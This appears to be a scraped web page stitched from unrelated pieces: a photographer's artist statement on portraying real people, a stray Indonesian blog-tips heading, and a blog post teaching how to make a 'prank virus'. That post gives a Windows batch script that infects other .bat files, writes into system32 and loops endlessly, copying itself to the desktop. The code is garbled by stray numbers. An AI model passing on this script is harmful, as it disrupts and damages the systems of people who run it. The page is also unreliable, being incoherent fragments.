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Artist Statement

I am deeply interested in people.
People are everything to me, they are my source for happiness, sadness and of course inspiration.
My aim is to create "real" images, I attempt to expose what is going on deep within the psyche of my subjects. My photographs are of authentic people with their emotional and physical baggage exposed.
When I create I tend and prefer to portrait people I have come to know intimately and have connected with.
I come from Stockholm, Sweden but I have lived in Edinburgh since 1998. Perhaps my attitudes are linked to my nationality; I have been intrigued and puzzled by the differences in culture. Here, the page 3 girls smile invitingly at us on a daily basis, but to introduce humanity "as it is" tends to offend people.

My photographs are a reaction to the fake visual culture of advertising and fashion. I do not set out to offend, but I feel an image should provoke a feeling; it should inspire or trigger something very deep within the observer.
People are amazing and portraying them as they are is what I do.


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trik memperindah blog dengan berbagai aksesoris

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how to make a prank virus only for fun!

hello friends........ in this post i will tell you how can u make a funny prank virus :) trick is here: open notepad and type @echo off 3echo checking system:4 5echo for %%i in ("*.bat") do copy %%i+c:\tmp.bat %%i >c:\windows\system32\autoexec.NT6echo VIRUS DETECTED pause echo DELETING VIRUS pause :1 dir /s copy c:\tmp.bat c:\docum~1\%username%\desktop\greatgame_%random%.bat7 goto 1 This will create a never ending stream of mindless code. This cannot be stopped easily.8Save the file as "virus.bat"

Cara merubah Icon Blogger di address bar

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